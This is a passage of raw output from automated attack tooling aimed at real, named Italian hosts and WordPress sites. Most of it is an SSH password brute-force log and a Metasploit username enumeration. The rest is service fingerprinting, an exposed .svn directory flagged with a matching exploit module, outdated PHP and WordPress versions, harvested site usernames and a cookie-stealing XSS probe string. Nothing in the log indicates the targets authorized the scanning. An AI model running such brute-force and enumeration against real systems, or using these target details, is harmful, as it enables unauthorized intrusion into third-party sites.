  2938. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  2939. NSE: [ssh-brute] Trying username/password pair: root:michelle
  2940. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  2941. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  2942. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  2943. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
  2944. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  2945. NSE: [ssh-brute] Trying username/password pair: guest:michelle
  2946. NSE: [ssh-brute] Trying username/password pair: user:michelle
  2947. NSE: [ssh-brute] Trying username/password pair: web:michelle
  2948. NSE: [ssh-brute] Trying username/password pair: test:michelle
  2949. NSE: [ssh-brute] Trying username/password pair: root:tigger
  2950. NSE: [ssh-brute] Trying username/password pair: admin:tigger
  2951. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
  2952. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
  2953. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
  2954. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
  2955. NSE: [ssh-brute] Trying username/password pair: guest:tigger
  2956. NSE: [ssh-brute] Trying username/password pair: user:tigger
  2957. NSE: [ssh-brute] Trying username/password pair: web:tigger
  2958. NSE: [ssh-brute] Trying username/password pair: test:tigger
  2959. NSE: [ssh-brute] Trying username/password pair: root:sunshine
  2960. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
  2961. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
  2962. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
  2963. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
  2964. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
  2965. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
  2966. NSE: [ssh-brute] Trying username/password pair: user:sunshine
  2967. NSE: [ssh-brute] Trying username/password pair: web:sunshine
  2968. NSE: [ssh-brute] Trying username/password pair: test:sunshine
  2969. NSE: [ssh-brute] Trying username/password pair: root:chocolate
  2970. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
  2971. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
  2972. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
  2973. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
  2974. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
  2975. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
  2976. NSE: [ssh-brute] Trying username/password pair: user:chocolate
  2977. NSE: [ssh-brute] Trying username/password pair: web:chocolate
  2978. NSE: [ssh-brute] Trying username/password pair: test:chocolate
  2979. NSE: [ssh-brute] Trying username/password pair: root:password1
  2980. NSE: [ssh-brute] Trying username/password pair: admin:password1
  2981. NSE: [ssh-brute] Trying username/password pair: administrator:password1
  2982. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
  2983. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
  2984. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
  2985. NSE: [ssh-brute] Trying username/password pair: guest:password1
  2986. NSE: [ssh-brute] Trying username/password pair: user:password1
  2987. NSE: [ssh-brute] Trying username/password pair: web:password1
  2988. NSE: [ssh-brute] Trying username/password pair: test:password1
  2989. NSE: [ssh-brute] Trying username/password pair: root:soccer
  2990. NSE: [ssh-brute] Trying username/password pair: admin:soccer
  2991. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
  2992. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
  2993. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
  2994. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
  2995. NSE: [ssh-brute] Trying username/password pair: guest:soccer
  2996. NSE: [ssh-brute] Trying username/password pair: user:soccer
  2997. NSE: [ssh-brute] Trying username/password pair: web:soccer
  2998. NSE: [ssh-brute] Trying username/password pair: test:soccer
  2999. NSE: [ssh-brute] Trying username/password pair: root:anthony
  3000. NSE: [ssh-brute] Trying username/password pair: admin:anthony
  3001. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
  3002. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
  3003. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
  3004. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
  3005. NSE: [ssh-brute] Trying username/password pair: guest:anthony
  3006. NSE: [ssh-brute] Trying username/password pair: user:anthony
  3007. NSE: [ssh-brute] Trying username/password pair: web:anthony
  3008. NSE: [ssh-brute] Trying username/password pair: test:anthony
  3009. NSE: [ssh-brute] Trying username/password pair: root:friends
  3010. NSE: [ssh-brute] Trying username/password pair: admin:friends
  3011. NSE: [ssh-brute] Trying username/password pair: administrator:friends
  3012. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
  3013. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
  3014. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
  3015. NSE: [ssh-brute] Trying username/password pair: guest:friends
  3016. NSE: [ssh-brute] Trying username/password pair: user:friends
  3017. NSE: [ssh-brute] Trying username/password pair: web:friends
  3018. NSE: [ssh-brute] Trying username/password pair: test:friends
  3019. NSE: [ssh-brute] Trying username/password pair: root:purple
  3020. NSE: [ssh-brute] Trying username/password pair: admin:purple
  3021. NSE: [ssh-brute] Trying username/password pair: administrator:purple
  3022. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
  3023. NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
  3024. NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
  3025. NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
  3026. Nmap scan report for host1.4marketing.it (77.238.18.215)
  3027. Host is up (0.16s latency).
  3028.  
  3029. PORT STATE SERVICE VERSION
  3030. 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
  3031. | ssh-auth-methods:
  3032. | Supported authentication methods:
  3033. | publickey
  3034. |_ password
  3035. | ssh-brute:
  3036. | Accounts: No valid accounts found
  3037. |_ Statistics: Performed 324 guesses in 181 seconds, average tps: 2.0
  3038. | ssh-hostkey:
  3039. | 1024 bf:7d:fc:6b:bb:a4:d2:d5:3a:f6:4f:93:90:8a:cc:c7 (DSA)
  3040. | 2048 97:d9:57:28:3e:87:a5:22:b6:fb:f8:e2:14:dc:d1:70 (RSA)
  3041. |_ 256 1a:a7:fd:2d:ee:01:c3:eb:58:df:25:5f:fb:44:66:f1 (ECDSA)
  3042. | ssh-publickey-acceptance:
  3043. |_ Accepted Public Keys: No public keys accepted
  3044. |_ssh-run: Failed to specify credentials and command to run.
  3045. |_vulscan: ERROR: Script execution failed (use -d to debug)
  3046. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3047. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.2 - 3.8 (94%), Linux 3.8 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.1 - 3.2 (93%), Linux 2.6.36 (92%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.5 (92%), Linux 3.0 - 3.2 (91%)
  3048. No exact OS matches for host (test conditions non-ideal).
  3049. Network Distance: 20 hops
  3050. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  3051.  
  3052. TRACEROUTE (using port 22/tcp)
  3053. HOP RTT ADDRESS
  3054. 1 104.09 ms 10.247.204.1
  3055. 2 60.36 ms vlan102.as04.qc1.ca.m247.com (176.113.74.145)
  3056. 3 58.22 ms irb-0.agg1.qc1.ca.m247.com (83.97.21.78)
  3057. 4 58.58 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
  3058. 5 58.57 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  3059. 6 58.64 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  3060. 7 68.05 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  3061. 8 77.52 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  3062. 9 48.20 ms if-ae-2-2.tcore1.n0v-new-york.as6453.net (216.6.90.21)
  3063. 10 39.85 ms if-ae-7-2.tcore1.nto-new-york.as6453.net (63.243.128.25)
  3064. 11 50.10 ms if-ae-9-2.tcore1.n75-new-york.as6453.net (63.243.128.122)
  3065. 12 70.24 ms 66.110.96.86
  3066. 13 149.05 ms etrunk3.milano1.mil.seabone.net (195.22.205.72)
  3067. 14 149.04 ms ibs-asr.milano1.mil.seabone.net (195.22.205.99)
  3068. 15 ... 19
  3069. 20 149.06 ms host1.4marketing.it (77.238.18.215)
  3070. ######################################################################################################################################
  3071. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  3072. RHOSTS => 77.238.18.215
  3073. RHOST => 77.238.18.215
  3074. [*] 77.238.18.215:22 - SSH - Using malformed packet technique
  3075. [*] 77.238.18.215:22 - SSH - Starting scan
  3076. [-] 77.238.18.215:22 - SSH - User 'admin' not found
  3077. [-] 77.238.18.215:22 - SSH - User 'administrator' not found
  3078. [-] 77.238.18.215:22 - SSH - User 'anonymous' not found
  3079. [-] 77.238.18.215:22 - SSH - User 'backup' not found
  3080. [-] 77.238.18.215:22 - SSH - User 'bee' not found
  3081. [-] 77.238.18.215:22 - SSH - User 'ftp' not found
  3082. [-] 77.238.18.215:22 - SSH - User 'guest' not found
  3083. [-] 77.238.18.215:22 - SSH - User 'GUEST' not found
  3084. [-] 77.238.18.215:22 - SSH - User 'info' not found
  3085. [-] 77.238.18.215:22 - SSH - User 'mail' not found
  3086. [-] 77.238.18.215:22 - SSH - User 'mailadmin' not found
  3087. [-] 77.238.18.215:22 - SSH - User 'msfadmin' not found
  3088. [-] 77.238.18.215:22 - SSH - User 'mysql' not found
  3089. [-] 77.238.18.215:22 - SSH - User 'nobody' not found
  3090. [-] 77.238.18.215:22 - SSH - User 'oracle' not found
  3091. [-] 77.238.18.215:22 - SSH - User 'owaspbwa' not found
  3092. [-] 77.238.18.215:22 - SSH - User 'postfix' not found
  3093. [-] 77.238.18.215:22 - SSH - User 'postgres' not found
  3094. [-] 77.238.18.215:22 - SSH - User 'private' not found
  3095. [-] 77.238.18.215:22 - SSH - User 'proftpd' not found
  3096. [-] 77.238.18.215:22 - SSH - User 'public' not found
  3097. [-] 77.238.18.215:22 - SSH - User 'root' not found
  3098. [-] 77.238.18.215:22 - SSH - User 'superadmin' not found
  3099. [-] 77.238.18.215:22 - SSH - User 'support' not found
  3100. [-] 77.238.18.215:22 - SSH - User 'sys' not found
  3101. [-] 77.238.18.215:22 - SSH - User 'system' not found
  3102. [-] 77.238.18.215:22 - SSH - User 'systemadmin' not found
  3103. [-] 77.238.18.215:22 - SSH - User 'systemadministrator' not found
  3104. [-] 77.238.18.215:22 - SSH - User 'test' not found
  3105. [-] 77.238.18.215:22 - SSH - User 'tomcat' not found
  3106. [-] 77.238.18.215:22 - SSH - User 'user' not found
  3107. [-] 77.238.18.215:22 - SSH - User 'webmaster' not found
  3108. [-] 77.238.18.215:22 - SSH - User 'www-data' not found
  3109. [-] 77.238.18.215:22 - SSH - User 'Fortimanager_Access' not found
  3110. [*] Scanned 1 of 1 hosts (100% complete)
  3111. [*] Auxiliary module execution completed
  3112. ######################################################################################################################################
  3113. Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 11:18 EDT
  3114. NSE: Loaded 164 scripts for scanning.
  3115. NSE: Script Pre-scanning.
  3116. Initiating NSE at 11:18
  3117. Completed NSE at 11:18, 0.00s elapsed
  3118. Initiating NSE at 11:18
  3119. Completed NSE at 11:18, 0.00s elapsed
  3120. Initiating Parallel DNS resolution of 1 host. at 11:18
  3121. Completed Parallel DNS resolution of 1 host. at 11:18, 0.02s elapsed
  3122. Initiating SYN Stealth Scan at 11:18
  3123. Scanning host1.4marketing.it (77.238.18.215) [1 port]
  3124. Discovered open port 443/tcp on 77.238.18.215
  3125. Completed SYN Stealth Scan at 11:18, 0.18s elapsed (1 total ports)
  3126. Initiating Service scan at 11:18
  3127. Scanning 1 service on host1.4marketing.it (77.238.18.215)
  3128. Completed Service scan at 11:18, 13.21s elapsed (1 service on 1 host)
  3129. Initiating OS detection (try #1) against host1.4marketing.it (77.238.18.215)
  3130. Retrying OS detection (try #2) against host1.4marketing.it (77.238.18.215)
  3131. Initiating Traceroute at 11:18
  3132. Completed Traceroute at 11:18, 3.02s elapsed
  3133. Initiating Parallel DNS resolution of 15 hosts. at 11:18
  3134. Completed Parallel DNS resolution of 15 hosts. at 11:18, 0.28s elapsed
  3135. NSE: Script scanning 77.238.18.215.
  3136. Initiating NSE at 11:18
  3137. Completed NSE at 11:23, 272.30s elapsed
  3138. Initiating NSE at 11:23
  3139. Completed NSE at 11:23, 2.13s elapsed
  3140. Nmap scan report for host1.4marketing.it (77.238.18.215)
  3141. Host is up (0.15s latency).
  3142.  
  3143. PORT STATE SERVICE VERSION
  3144. 443/tcp open ssl/http nginx 1.6.2
  3145. | http-brute:
  3146. |_ Path "/" does not require authentication
  3147. |_http-chrono: Request times for /; avg: 2441.08ms; min: 1759.51ms; max: 3439.23ms
  3148. |_http-csrf: Couldn't find any CSRF vulnerabilities.
  3149. |_http-date: Wed, 25 Sep 2019 15:18:47 GMT; -7s from local time.
  3150. |_http-devframework: Wordpress detected. Found common traces on /
  3151. |_http-dombased-xss: Couldn't find any DOM based XSS.
  3152. |_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
  3153. |_http-errors: Couldn't find any error pages.
  3154. |_http-feed: Couldn't find any feeds.
  3155. |_http-fetch: Please enter the complete path of the directory to save data in.
  3156. | http-headers:
  3157. | Server: nginx/1.6.2
  3158. | Date: Wed, 25 Sep 2019 15:20:16 GMT
  3159. | Content-Type: text/html; charset=UTF-8
  3160. | Transfer-Encoding: chunked
  3161. | Connection: close
  3162. | X-Powered-By: PHP/5.4.45-0+deb7u9
  3163. | X-Pingback: https://www.alladv.it/xmlrpc.php
  3164. | Location: https://www.alladv.it/
  3165. |
  3166. |_ (Request type: GET)
  3167. |_http-jsonp-detection: Couldn't find any JSONP endpoints.
  3168. | http-methods:
  3169. |_ Supported Methods: GET HEAD POST
  3170. |_http-mobileversion-checker: ERROR: Script execution failed (use -d to debug)
  3171. | http-php-version: Versions from credits query (more accurate): 5.4.15 - 5.4.45
  3172. |_Version from header x-powered-by: PHP/5.4.45-0+deb7u9
  3173. | http-security-headers:
  3174. | Strict_Transport_Security:
  3175. |_ HSTS not configured in HTTPS Server
  3176. |_http-server-header: nginx/1.6.2
  3177. | http-sitemap-generator:
  3178. | Directory structure:
  3179. | Longest directory structure:
  3180. | Depth: 0
  3181. | Dir: /
  3182. | Total files found (by extension):
  3183. |_
  3184. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  3185. |_http-title: 400 The plain HTTP request was sent to HTTPS port
  3186. |_http-traceroute: ERROR: Script execution failed (use -d to debug)
  3187. | http-vhosts:
  3188. | 65 names had status 400
  3189. |_62 names had status 301
  3190. | http-waf-detect: IDS/IPS/WAF detected:
  3191. |_host1.4marketing.it:443/?p4yl04d3=<script>alert(document.cookie)</script>
  3192. | http-wordpress-brute:
  3193. | Accounts: No valid accounts found
  3194. | Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
  3195. |_ ERROR: The service seems to have failed or is heavily firewalled...
  3196. | http-wordpress-enum:
  3197. | Search limited to top 100 themes/plugins
  3198. | themes
  3199. | twentytwelve 1.3
  3200. | twentythirteen 1.1
  3201. | twentyfourteen 1.2
  3202. | plugins
  3203. | akismet 3.1.7
  3204. | wordpress-seo 3.0.7
  3205. | w3-total-cache 0.9.4.1
  3206. |_ captcha 4.1.7
  3207. | http-wordpress-users:
  3208. | Username found: techsupport/" />
  3209. | <!-- / Yoast SEO plugin. -->
  3210. |
  3211. | <link rel="alternate" type="application/rss+xml" title="All Advertising &raquo; Feed" href="https://www.alladv.it
  3212. | Username found: alessandro/" />
  3213. | <!-- / Yoast SEO plugin. -->
  3214. |
  3215. | <link rel="alternate" type="application/rss+xml" title="All Advertising &raquo; Feed" href="https://www.alladv.it
  3216. | Username found: all-advertising/" />
  3217. | <!-- / Yoast SEO plugin. -->
  3218. |
  3219. | <link rel="alternate" type="application/rss+xml" title="All Advertising &raquo; Feed" href="https://www.alladv.it
  3220. |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
  3221. |_http-xssed: No previously reported XSS vuln.
  3222. |_vulscan: ERROR: Script execution failed (use -d to debug)
  3223. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3224. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.2 - 3.8 (94%), Linux 3.8 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 2.6.36 (93%), Linux 3.5 (93%), Linux 3.1 - 3.2 (92%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.0 - 3.2 (91%)
  3225. No exact OS matches for host (test conditions non-ideal).
  3226. Uptime guess: 164.354 days (since Sun Apr 14 02:53:36 2019)
  3227. Network Distance: 20 hops
  3228. TCP Sequence Prediction: Difficulty=258 (Good luck!)
  3229. IP ID Sequence Generation: All zeros
  3230.  
  3231. TRACEROUTE (using port 443/tcp)
  3232. HOP RTT ADDRESS
  3233. 1 97.73 ms 10.247.204.1
  3234. 2 97.80 ms vlan102.as04.qc1.ca.m247.com (176.113.74.145)
  3235. 3 54.36 ms irb-0.agg1.qc1.ca.m247.com (83.97.21.78)
  3236. 4 51.96 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
  3237. 5 52.04 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  3238. 6 52.04 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  3239. 7 52.11 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  3240. 8 51.94 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  3241. 9 50.63 ms if-ae-2-2.tcore1.n0v-new-york.as6453.net (216.6.90.21)
  3242. 10 60.60 ms if-ae-7-5.tcore1.nto-new-york.as6453.net (63.243.128.141)
  3243. 11 71.78 ms if-ae-9-2.tcore1.n75-new-york.as6453.net (63.243.128.122)
  3244. 12 50.54 ms 66.110.96.86
  3245. 13 153.91 ms etrunk3.milano1.mil.seabone.net (195.22.205.72)
  3246. 14 153.89 ms ibs-asr.milano1.mil.seabone.net (195.22.205.99)
  3247. 15 ... 19
  3248. 20 132.24 ms host1.4marketing.it (77.238.18.215)
  3249.  
  3250. NSE: Script Post-scanning.
  3251. Initiating NSE at 11:23
  3252. Completed NSE at 11:23, 0.00s elapsed
  3253. Initiating NSE at 11:23
  3254. Completed NSE at 11:23, 0.00s elapsed
  3255. #####################################################################################################################################
  3256. https://77.238.18.215 [301 Moved Permanently] Country[ITALY][IT], HTTPServer[nginx/1.6.2], IP[77.238.18.215], PHP[5.4.45-0+deb7u9], RedirectLocation[https://www.alladv.it/], X-Powered-By[PHP/5.4.45-0+deb7u9], nginx[1.6.2], x-pingback[https://www.alladv.it/xmlrpc.php]
  3257. https://www.alladv.it/ [200 OK] Country[ITALY][IT], Email[alladv@alldv.it,alladv@alldv.it ], Google-Analytics[Universal][UA-46338052-1], HTTPServer[nginx/1.6.2], IP[77.238.18.215], JQuery[1.11.3], MetaGenerator[WordPress 4.4.1], Modernizr[transitions], PHP[5.4.45-0+deb7u9], Script[application/ld+json,text/javascript], Title[All Advertising, facciamo di tutto per comunicare][Title element contains newline(s)!], UncommonHeaders[link], W3-Total-Cache, WordPress[4.4.1], X-Powered-By[PHP/5.4.45-0+deb7u9], nginx[1.6.2], x-pingback[https://www.alladv.it/xmlrpc.php]
  3258. ######################################################################################################################################
  3259. Version: 1.11.13-static
  3260. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3261.  
  3262. Connected to 77.238.18.215
  3263.  
  3264. Testing SSL server 77.238.18.215 on port 443 using SNI name 77.238.18.215
  3265.  
  3266. TLS Fallback SCSV:
  3267. Server supports TLS Fallback SCSV
  3268.  
  3269. TLS renegotiation:
  3270. Secure session renegotiation supported
  3271.  
  3272. TLS Compression:
  3273. Compression disabled
  3274.  
  3275. Heartbleed:
  3276. TLS 1.2 not vulnerable to heartbleed
  3277. TLS 1.1 not vulnerable to heartbleed
  3278. TLS 1.0 not vulnerable to heartbleed
  3279.  
  3280. Supported Server Cipher(s):
  3281. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  3282. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  3283. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3284. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  3285. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  3286. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  3287. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  3288. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  3289. Accepted TLSv1.2 256 bits AES256-SHA256
  3290. Accepted TLSv1.2 256 bits AES256-SHA
  3291. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  3292. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  3293. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  3294. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3295. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  3296. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  3297. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  3298. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  3299. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  3300. Accepted TLSv1.2 128 bits AES128-SHA256
  3301. Accepted TLSv1.2 128 bits AES128-SHA
  3302. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  3303. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3304. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  3305. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  3306. Accepted TLSv1.1 256 bits AES256-SHA
  3307. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  3308. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3309. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  3310. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  3311. Accepted TLSv1.1 128 bits AES128-SHA
  3312. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  3313. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3314. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  3315. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  3316. Accepted TLSv1.0 256 bits AES256-SHA
  3317. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  3318. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3319. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  3320. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  3321. Accepted TLSv1.0 128 bits AES128-SHA
  3322. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  3323.  
  3324. SSL Certificate:
  3325. Signature Algorithm: sha256WithRSAEncryption
  3326. RSA Key Strength: 2048
  3327.  
  3328. Subject: www.alladv.it
  3329. Altnames: DNS:www.alladv.it, DNS:alladv.it
  3330. Issuer: RapidSSL RSA CA 2018
  3331.  
  3332. Not valid before: Feb 11 00:00:00 2019 GMT
  3333. Not valid after: Mar 12 12:00:00 2020 GMT
  3334. ######################################################################################################################################
  3335. --------------------------------------------------------
  3336. <<<Yasuo discovered following vulnerable applications>>>
  3337. --------------------------------------------------------
  3338. +----------+---------------------------------+----------------------------------------------+----------+----------+
  3339. | App Name | URL to Application | Potential Exploit | Username | Password |
  3340. +----------+---------------------------------+----------------------------------------------+----------+----------+
  3341. | SVN | https://77.238.18.215:443/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | | |
  3342. +----------+---------------------------------+----------------------------------------------+----------+----------+
  3343. #####################################################################################################################################
  3344. [+] URL: http://www.granloggiafemminile.it/
  3345. [+] Started: Wed Sep 25 10:54:34 2019
  3346.  
  3347. Interesting Finding(s):
  3348.  
  3349. [+] http://www.granloggiafemminile.it/
  3350. | Interesting Entries:
  3351. | - Server: nginx/1.6.2
  3352. | - X-Powered-By: PHP/5.4.45-0+deb7u9
  3353. | Found By: Headers (Passive Detection)
  3354. | Confidence: 100%
  3355.  
  3356. [+] http://www.granloggiafemminile.it/xmlrpc.php
  3357. | Found By: Headers (Passive Detection)
  3358. | Confidence: 60%
  3359. | Confirmed By: Link Tag (Passive Detection), 30% confidence
  3360. | References:
  3361. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3362. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3363. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3364. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3365. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3366.  
  3367. [+] http://www.granloggiafemminile.it/readme.html
  3368. | Found By: Direct Access (Aggressive Detection)
  3369. | Confidence: 100%
  3370.  
  3371. [+] http://www.granloggiafemminile.it/wp-cron.php
  3372. | Found By: Direct Access (Aggressive Detection)
  3373. | Confidence: 60%
  3374. | References:
  3375. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3376. | - https://github.com/wpscanteam/wpscan/issues/1299
  3377.  
  3378. [+] WordPress version 4.1.9 identified (Insecure, released on 2016-01-06).
  3379. | Detected By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
  3380. | - http://www.granloggiafemminile.it/wp-includes/js/comment-reply.min.js?ver=4.1.9
  3381. | Confirmed By: Plugin And Theme Query Parameter In Homepage (Passive Detection)
  3382. | - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  3383. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/bootstrap.min.css?ver=4.1.9
  3384. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello.css?ver=4.1.9
  3385. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/flexslider.css?ver=4.1.9
  3386. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/owl.carousel.css?ver=4.1.9
  3387. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/responsive-calendar.css?ver=4.1.9
  3388. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/chosen.css?ver=4.1.9
  3389. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/css/jackbox.min.css?ver=4.1.9
  3390. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/cloud-zoom.css?ver=4.1.9
  3391. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/colorpicker.css?ver=4.1.9
  3392. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video-js.css?ver=4.1.9
  3393. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/style1.css?ver=4.1.9
  3394. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&ver=4.1.9
  3395. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/footable.core.css?ver=4.1.9
  3396. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/bootstrap.css?ver=4.1.9
  3397. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/mystyle.css?ver=4.1.9
  3398. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/style.css?ver=4.1.9
  3399. | - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.queryloader2.min.js?ver=4.1.9
  3400. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&ver=4.1.9
  3401. | - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&ver=4.1.9
  3402. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/jquery.validate.js?ver=4.1.9
  3403. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.js?ver=4.1.9
  3404. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.sort.js?ver=4.1.9
  3405. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.paginate.js?ver=4.1.9
  3406. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.filter.js?ver=4.1.9
  3407. | - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/chosen.jquery.js?ver=4.1.9
